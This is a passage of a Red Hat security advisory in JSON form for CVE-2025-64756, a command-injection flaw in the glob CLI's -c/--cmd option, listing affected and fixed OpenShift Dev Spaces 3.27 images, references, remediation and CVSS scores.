"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2415451"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in glob. This vulnerability allows arbitrary command execution via processing files with malicious names when the glob command-line interface (CLI) is used with the -c/--cmd option, enabling shell metacharacters to trigger command injection.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "glob: glob: Command Injection Vulnerability via Malicious Filenames",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw in glob allows arbitrary command execution when the `glob` command-line interface is used with the `-c/--cmd` option to process files with malicious names. The vulnerability is triggered by shell metacharacters in filenames, leading to command injection. The glob CLI tool utilizes the -c option to execute shell commands over the files which matched the searched pattern by using the shell:true parameter when creating the subprocess which will further execute the command informed via \u0027-c\u0027 option, this parameter allows the shell meta characters to be used and processed when executing the command. Given that information glob misses to sanitize the file name to eliminate such characters and expressions from the filename, leading to code execution as when performing the shell expansion such characters will be interpreted as shell commands.\n\nTo exploit this vulnerability the targeted system should run the glob CLI over a file with a maliciously crafted filename, additionally the attacker needs to have enough permission to create such file or trick the user to download and process the required file with the glob CLI.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-64756"
},
{
"category": "external",
"summary": "RHBZ#2415451",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2415451"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-64756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64756"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146",
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2",
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
}
],
"release_date": "2025-11-17T17:29:08.029000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "To mitigate this issue, avoid using the `glob` command-line interface with the `-c` or `--cmd` option when processing filenames from untrusted sources. If programmatic use of `glob` is necessary, ensure that filenames are thoroughly sanitized before being passed to commands executed with shell interpretation enabled.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
